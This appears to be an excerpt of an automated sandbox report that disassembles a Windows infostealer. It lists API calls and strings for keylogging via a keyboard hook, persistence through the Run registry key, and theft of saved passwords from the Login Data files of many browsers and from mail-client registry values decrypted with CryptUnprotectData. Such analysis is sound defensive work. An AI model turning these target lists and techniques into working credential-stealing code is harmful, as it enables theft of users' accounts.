                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$ByteCharMultiVirtualWidelstrcpy$AllocFree
                                                • String ID:
                                                • API String ID: 4006399363-0
                                                • Opcode ID: 563fc5b71df9bd21d2d0311d6f605a9cc0fd5e93b4c1bbf32f436dcd5d41cb95
                                                • Instruction ID: 347e0e7f3c94eb91d88cbe649d0f3742026b32d0cfcfbff0d8a20a08a7cea218
                                                • Opcode Fuzzy Hash: 563fc5b71df9bd21d2d0311d6f605a9cc0fd5e93b4c1bbf32f436dcd5d41cb95
                                                • Instruction Fuzzy Hash: CE014C75601114BBDB15AFA5CC86DDE7AAD9F49355B00413AB901EB2D2CA789F008BA8
                                                Function 00405EEE Relevance: 2.5, APIs: 2, Instructions: 6memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,?,00403044,?,00405C22,00000000,?,004110EE,?,?,004136B9), ref: 00405EF1
                                                • HeapFree.KERNEL32(00000000), ref: 00405EF8
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                • Opcode ID: 3d30368483855cb176dc1d7fc82ddea602118197b7e971394d3f9e6bed523871
                                                • Instruction ID: 83c753a965441c1ae2adaa02f530585fa7d1ded7e68711522ece6e6ceeecec04
                                                • Opcode Fuzzy Hash: 3d30368483855cb176dc1d7fc82ddea602118197b7e971394d3f9e6bed523871
                                                • Instruction Fuzzy Hash: 67A00271994101BBDD4457E19D0DB55392C9795712F00C554B206C6150D66454408635
                                                Function 0040F481 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
                                                  • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092
                                                • GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,00413589,?,00411618,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0040F4A2
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00411E18,00000000,00000000,00000000,00000000,h\HA,00000000), ref: 0040109F
                                                  • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$FreeProcesslstrcpylstrlen$AllocateFileModuleNameVirtual
                                                • String ID:
                                                • API String ID: 258861418-0
                                                • Opcode ID: c06f8cdb672322414aa60946f8d43c776e1b73815f21407eed711641c072f653
                                                • Instruction ID: ad1d1cd4c4ffaa7fef57f39b98bb0a0bcd1ac32502b314b3bb451a36869a539d
                                                • Opcode Fuzzy Hash: c06f8cdb672322414aa60946f8d43c776e1b73815f21407eed711641c072f653
                                                • Instruction Fuzzy Hash: F8E06D726042507BD614BB66DC1AFAF3BADCFC132AF00003EF545A61D1EFB85A40C6A8
                                                Function 0040F76B Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                Download Yara Rule
                                                APIs
                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0040F79C
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FolderPathSpeciallstrcpy
                                                • String ID:
                                                • API String ID: 1680175942-0
                                                • Opcode ID: 6a469b24d73eabc363334ba3b78e70bf45d210dfd43ed31c53b968ede7a2c440
                                                • Instruction ID: d4192ae8197cefced1db0a03bf75d2c8b75bf692e971decfd73498c83af346c8
                                                • Opcode Fuzzy Hash: 6a469b24d73eabc363334ba3b78e70bf45d210dfd43ed31c53b968ede7a2c440
                                                • Instruction Fuzzy Hash: 71E0927560031826DB60A6169C0EFC73A6CCBC0715F0001B1BA58E21D1ED74DA4486A4
                                                Function 00410F6E Relevance: 1.5, APIs: 1, Instructions: 28registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000), ref: 00410F8E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 2cedeb436092c0e7d31b5472948933f5d0e3bcf46d46cc8e0073c1b7bfb3d076
                                                • Instruction ID: 7669a687ca45e1490fd892bd00859a81e3b5d15af61ddd1ed0ad8dbd2140f463
                                                • Opcode Fuzzy Hash: 2cedeb436092c0e7d31b5472948933f5d0e3bcf46d46cc8e0073c1b7bfb3d076
                                                • Instruction Fuzzy Hash: 6DE0DF32515229FFDB308B528D09ECB3E6CDF45BE4F008025F60AA3140C2F18A81D6F4
                                                Function 004031D4 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                Download Yara Rule
                                                APIs
                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403207
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$EnvironmentExpandStringslstrcpy
                                                • String ID:
                                                • API String ID: 1709970682-0
                                                • Opcode ID: 237e0090f58f7f10296270526495333552abd1a6647df425db10d62f2dbe6493
                                                • Instruction ID: 361a2c420108ea36677c7ead1158915028ec3e9eb633b46eb3cce66c0af5bf23
                                                • Opcode Fuzzy Hash: 237e0090f58f7f10296270526495333552abd1a6647df425db10d62f2dbe6493
                                                • Instruction Fuzzy Hash: 1FE048B670011967DB20AA169C06FD677ADDBC471CF0400B9B709F31D0E975DA46C6A8
                                                Function 00411039 Relevance: 1.5, APIs: 1, Instructions: 25registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Value
                                                • String ID:
                                                • API String ID: 3702945584-0
                                                • Opcode ID: 71c395d56bab440cb5e8a2611520b33c7a9b1948d96e0ab128bccc67a15d78c8
                                                • Instruction ID: ad393a25aeec7bbb3542dc1e807f895c46ee7eb920267ead19ed583e7b864499
                                                • Opcode Fuzzy Hash: 71c395d56bab440cb5e8a2611520b33c7a9b1948d96e0ab128bccc67a15d78c8
                                                • Instruction Fuzzy Hash: EDE04F32601154AFDB00CF54CC44EE77BA8EF4EB50B14805AFE059B320D636EC90DBA8
                                                Function 00403335 Relevance: 1.5, APIs: 1, Instructions: 25stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00403261: lstrlenW.KERNEL32(770113FB,00403646,?,?,?,0041150A,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00403268
                                                • lstrcatW.KERNEL32(00000000,770113FB,?,?,00413589,?,00411515,00413589,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00403365
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcatlstrlen
                                                • String ID:
                                                • API String ID: 1475610065-0
                                                • Opcode ID: 6faf23d1a4cfa45ea84e11ef5373c353b7d7e62a0f14d1be2c89c1a7e14e6168
                                                • Instruction ID: 9996310d9ea1feaf5dd69399781489ef40f93ee32ef9e0fdad74d2a122f6ac21
                                                • Opcode Fuzzy Hash: 6faf23d1a4cfa45ea84e11ef5373c353b7d7e62a0f14d1be2c89c1a7e14e6168
                                                • Instruction Fuzzy Hash: 12E0D8722002105BCB006BAAE88486E7B5DEF95360B04007EF90597250EA346C108AD4
                                                Function 004058D3 Relevance: 1.5, APIs: 1, Instructions: 23networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00410298: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,0040FEDE,?,?,00410459,?,770113FB,00000000,00405A34), ref: 004102A0
                                                • WSAStartup.WS2_32(00000002,?), ref: 004058FC
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateMutexStartup
                                                • String ID:
                                                • API String ID: 3730780901-0
                                                • Opcode ID: 6b5ebe703eb1df4dc6c5b6a19a8fd1f855588e1ba8f6d968cf0325ade6988588
                                                • Instruction ID: 2f07ef21999864c7bdc7f9a93e1228b6d7789604c4959b27d926bf46a4c2bd3d
                                                • Opcode Fuzzy Hash: 6b5ebe703eb1df4dc6c5b6a19a8fd1f855588e1ba8f6d968cf0325ade6988588
                                                • Instruction Fuzzy Hash: E6E0ED71511B108BC270AF2B9945997FBFCFFD47207004B1FA4A782AA1C7B4B545CB90
                                                Function 0040FDA5 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00403125: lstrcatA.KERNEL32(00000000,770113FB,?,00000000,?,004035C4,00000000,00000000,?,00404E98,?,?,?,?,?,00000000), ref: 00403151
                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 0040FDC0
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateEventlstrcat
                                                • String ID:
                                                • API String ID: 2275612694-0
                                                • Opcode ID: 5ae8bd7ff6c3201f16b195092c820324ad59687317be235315f7bc08c8dd6c29
                                                • Instruction ID: 3240f45b1c7ddb12a8ade5aa24fea2b364c3baaf0ce4d7f612b8c195746a9c55
                                                • Opcode Fuzzy Hash: 5ae8bd7ff6c3201f16b195092c820324ad59687317be235315f7bc08c8dd6c29
                                                • Instruction Fuzzy Hash: 65D05E322442057BD710EF91DC0AF86FF6AEB95761F008036F65996590DBB1A030C794
                                                Function 00410298 Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,0040FEDE,?,?,00410459,?,770113FB,00000000,00405A34), ref: 004102A0
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateMutex
                                                • String ID:
                                                • API String ID: 1964310414-0
                                                • Opcode ID: e9934b6d034fafb1d0200725ba1cf85a26b321b84d8249228bf6a4144c015bfc
                                                • Instruction ID: 97f6e39e9459aadd3e0cfa1cac3660fe97848e7290b305563a34b971961bdcef
                                                • Opcode Fuzzy Hash: e9934b6d034fafb1d0200725ba1cf85a26b321b84d8249228bf6a4144c015bfc
                                                • Instruction Fuzzy Hash: 43D012F15005205FA3249F395C488A775DDEF98720315CE39B4A5C71D4E6308C808770
                                                Function 00410FAE Relevance: 1.5, APIs: 1, Instructions: 9registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: c98f4b4dfda092bd2d12ca10e2daea2df349831acd3782244b87714ec316371f
                                                • Instruction ID: 3bf35448e78bb38c218515adc370377afc947f5d07f08b3267651bc3409b9d1e
                                                • Opcode Fuzzy Hash: c98f4b4dfda092bd2d12ca10e2daea2df349831acd3782244b87714ec316371f
                                                • Instruction Fuzzy Hash: FAC04832024221CBE7361F18F8097D1BAE6AB44322F29086EE4C0661A4E7F908D1CA88
                                                Function 0040F71F Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                Download Yara Rule
                                                APIs
                                                • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0040F725
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateDirectory
                                                • String ID:
                                                • API String ID: 4241100979-0
                                                • Opcode ID: d5e727189ccb4a8055294063d4bcc6c1c118f0409fcdf43886da262030cd376a
                                                • Instruction ID: 31fd1221f8bcf50e00c872df143f66dd9980ced791cc60c43c08ecf6c7bc2ccd
                                                • Opcode Fuzzy Hash: d5e727189ccb4a8055294063d4bcc6c1c118f0409fcdf43886da262030cd376a
                                                • Instruction Fuzzy Hash: 6EB012303E830157DA401B708C06F1035129782F07F2001B0B156C80E0C66100005508
                                                Function 00412C91 Relevance: 1.3, APIs: 1, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Uninitialize
                                                • String ID:
                                                • API String ID: 3861434553-0
                                                • Opcode ID: d2f86cddff055a8f01f651fc2b48145621239c862b6a9bd34ed92f51cbb3aa54
                                                • Instruction ID: 8ed61a9c087cf6336e17bec63ecc26b577de9c15e1404c34a1aedccc011bc0eb
                                                • Opcode Fuzzy Hash: d2f86cddff055a8f01f651fc2b48145621239c862b6a9bd34ed92f51cbb3aa54
                                                • Instruction Fuzzy Hash: A00127752117008BD778DF26CA9886BB7F4BF587043041A2EA49797AA1DBB8F840CA54
                                                Function 00405E22 Relevance: 1.3, APIs: 1, Instructions: 17memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004033E2,?,00405A4F,h\HA,00000000), ref: 00405E30
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 820d568b735e8b98086b9003d51802545f577bee81ea7e8b788eea8fe27fb93a
                                                • Instruction ID: 4cf4b96cc7d198ddbfe5a03f5e3f7b68f09905f0a8ce7e22956d0c5921a7b56d
                                                • Opcode Fuzzy Hash: 820d568b735e8b98086b9003d51802545f577bee81ea7e8b788eea8fe27fb93a
                                                • Instruction Fuzzy Hash: B9C0122234822027F124115BBC1AF5B8D5CCBC1F75F01002FF7049A2D0D8D50C0281A8
                                                Function 00409FCE Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID:
                                                • API String ID: 1263568516-0
                                                • Opcode ID: 62325fd014d102c71d90c56f2f6d609a61725c63e8465867eab987d24a3df0f7
                                                • Instruction ID: e42f407c2e177447542b0d64c950044e8bfaee0f330607f11840718ece24623c
                                                • Opcode Fuzzy Hash: 62325fd014d102c71d90c56f2f6d609a61725c63e8465867eab987d24a3df0f7
                                                • Instruction Fuzzy Hash: A4B0923038070057EE2CCB308C95F6A2311BB80B06FA185ADB182EA1D08BB9E4418A48
                                                Function 00405EB4 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403652,?,?,?,0041150A,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00405EBE
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: d49ef48d043526f3490ffb0dd7c6a127032e0ea4a4a3536e1287c42be51b02d7
                                                • Instruction ID: dbf17126153eed8f7640880b16ee2d7e8fc1bb2d9721b8e08dab88764d432ae1
                                                • Opcode Fuzzy Hash: d49ef48d043526f3490ffb0dd7c6a127032e0ea4a4a3536e1287c42be51b02d7
                                                • Instruction Fuzzy Hash: 32A002F07D53007AFD6997A1ED1FF553D18A784F16F204154B30D6D0D095E02500852D
                                                Function 00405EA5 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID:
                                                • API String ID: 1263568516-0
                                                • Opcode ID: 4929ad304a769bad059723d740a7bc2dc1be2e7c52749c2f15ff7088a1f8f1d5
                                                • Instruction ID: 0f69062a78de5f847fecf765a3df09eb473d7eb4de896a3725156c76b460eb0a
                                                • Opcode Fuzzy Hash: 4929ad304a769bad059723d740a7bc2dc1be2e7c52749c2f15ff7088a1f8f1d5
                                                • Instruction Fuzzy Hash: 05A002706D070066ED7457605D4AF4526146780F41F2186947241A80E08AF5A0848A5C

                                                Non-executed Functions

                                                Function 004089D5 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 286keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetAsyncKeyState.USER32 ref: 00408A11
                                                • CallNextHookEx.USER32(00000000,?,?,?), ref: 00408E12
                                                  • Part of subcall function 00408E66: GetForegroundWindow.USER32 ref: 00408E8F
                                                  • Part of subcall function 00408E66: GetWindowTextW.USER32(00000000,?,00000104,?,?), ref: 00408EA2
                                                  • Part of subcall function 00408E66: lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408F0B
                                                  • Part of subcall function 00408E66: CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 00408F79
                                                  • Part of subcall function 00408E66: lstrlenW.KERNEL32(00414AD0,00000008,00000000,?,?), ref: 00408FA2
                                                  • Part of subcall function 00408E66: WriteFile.KERNEL32(?,00414AD0,00000000,?,?), ref: 00408FAE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
                                                • String ID: [ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]
                                                • API String ID: 2452648998-4143582258
                                                • Opcode ID: 20a26bd837e8a45a9da493f01822eff26ae27b03a4fc8edf5ebc4670da262466
                                                • Instruction ID: 05debb29b961db7218db3d5b35fbbb282043b3bd797af140fe8c149a1109971b
                                                • Opcode Fuzzy Hash: 20a26bd837e8a45a9da493f01822eff26ae27b03a4fc8edf5ebc4670da262466
                                                • Instruction Fuzzy Hash: 90919E32A09210C7D628125887587BA6521ABE1340F25853FEAC7B7BE0DF3C9DD256DF
                                                Function 0040C1B2 Relevance: 36.5, Strings: 29, Instructions: 218COMMON
                                                Download Yara Rule
                                                Strings
                                                • \BraveSoftware\Brave-Browser\User Data\Default\Login Data, xrefs: 0040C315
                                                • \CentBrowser\User Data\Default\Login Data, xrefs: 0040C39C
                                                • \Tencent\QQBrowser\User Data\Default\Login Data, xrefs: 0040C2A8
                                                • \Torch\User Data\Default\Login Data, xrefs: 0040C366
                                                • \Blisk\User Data\Local State, xrefs: 0040C2DA
                                                • \Microsoft\Edge\User Data\Local State, xrefs: 0040C26C
                                                • \Microsoft\Edge\User Data\Default\Login Data, xrefs: 0040C271
                                                • \Chromium\User Data\Default\Login Data, xrefs: 0040C2FA
                                                • \Opera Software\Opera Stable\Login Data, xrefs: 0040C2C4
                                                • \Comodo\Dragon\User Data\Default\Login Data, xrefs: 0040C34B
                                                • ,%@, xrefs: 0040C415
                                                • \Google\Chrome\User Data\Local State, xrefs: 0040C236
                                                • \Vivaldi\User Data\Local State, xrefs: 0040C329
                                                • \Blisk\User Data\Default\Login Data, xrefs: 0040C2DF
                                                • \Chromium\User Data\Local State, xrefs: 0040C2F5
                                                • \Slimjet\User Data\Default\Login Data, xrefs: 0040C381
                                                • \Opera Software\Opera Stable\Local State, xrefs: 0040C2BF
                                                • \Torch\User Data\Local State, xrefs: 0040C361
                                                • \CentBrowser\User Data\Local State, xrefs: 0040C397
                                                • \BraveSoftware\Brave-Browser\User Data\Local State, xrefs: 0040C310
                                                • \Epic Privacy Browser\User Data\Local State, xrefs: 0040C251
                                                • \Comodo\Dragon\User Data\Local State, xrefs: 0040C346
                                                • \UCBrowser\User Data_i18n\Default\UC Login Data.17, xrefs: 0040C28D
                                                • \Slimjet\User Data\Local State, xrefs: 0040C37C
                                                • \Tencent\QQBrowser\User Data\Local State, xrefs: 0040C2A3
                                                • \Vivaldi\User Data\Default\Login Data, xrefs: 0040C330
                                                • \Epic Privacy Browser\User Data\Default\Login Data, xrefs: 0040C256
                                                • \Google\Chrome\User Data\Default\Login Data, xrefs: 0040C23B
                                                • \UCBrowser\User Data_i18n\Local State, xrefs: 0040C288
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FilePath$lstrcatlstrcpy$BinaryCopyExistsOpenType$CloseCombineEnumFolderInfoPrivateProfileQuerySpecialString
                                                • String ID: ,%@$\Blisk\User Data\Default\Login Data$\Blisk\User Data\Local State$\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\BraveSoftware\Brave-Browser\User Data\Local State$\CentBrowser\User Data\Default\Login Data$\CentBrowser\User Data\Local State$\Chromium\User Data\Default\Login Data$\Chromium\User Data\Local State$\Comodo\Dragon\User Data\Default\Login Data$\Comodo\Dragon\User Data\Local State$\Epic Privacy Browser\User Data\Default\Login Data$\Epic Privacy Browser\User Data\Local State$\Google\Chrome\User Data\Default\Login Data$\Google\Chrome\User Data\Local State$\Microsoft\Edge\User Data\Default\Login Data$\Microsoft\Edge\User Data\Local State$\Opera Software\Opera Stable\Local State$\Opera Software\Opera Stable\Login Data$\Slimjet\User Data\Default\Login Data$\Slimjet\User Data\Local State$\Tencent\QQBrowser\User Data\Default\Login Data$\Tencent\QQBrowser\User Data\Local State$\Torch\User Data\Default\Login Data$\Torch\User Data\Local State$\UCBrowser\User Data_i18n\Default\UC Login Data.17$\UCBrowser\User Data_i18n\Local State$\Vivaldi\User Data\Default\Login Data$\Vivaldi\User Data\Local State
                                                • API String ID: 2377953819-628738739
                                                • Opcode ID: 8bcfc4cc197bdf7b089a31a3a36bda61dddf1a2a8f15d2f03414e22e2d40358c
                                                • Instruction ID: 33a1bfa3a0cad1bb0e33785dc6f3568ed4cf5559e2641269e6d084d4c59330ea
                                                • Opcode Fuzzy Hash: 8bcfc4cc197bdf7b089a31a3a36bda61dddf1a2a8f15d2f03414e22e2d40358c
                                                • Instruction Fuzzy Hash: 4B713230351200AFC714EB61DDA2EEA3769EFD6B14B10417EF1066B2E1CAB96C40CB6D
                                                Function 0040A29A Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 296registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000), ref: 0040A31C
                                                • RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000), ref: 0040A363
                                                • RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 0040A3A7
                                                • RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 0040A3EB
                                                • RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 0040A42F
                                                • RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 0040A473
                                                • RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 0040A4E0
                                                • RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 0040A54D
                                                • RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 0040A5BA
                                                  • Part of subcall function 0040A632: GlobalAlloc.KERNEL32(00000040,-00000001,770145FD,?,?,?,0040A5E6,00001000,?,00000000,00001000), ref: 0040A650
                                                  • Part of subcall function 0040A632: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040A5E6), ref: 0040A686
                                                  • Part of subcall function 0040A632: lstrcpyW.KERNEL32(?,Could not decrypt), ref: 0040A6BD
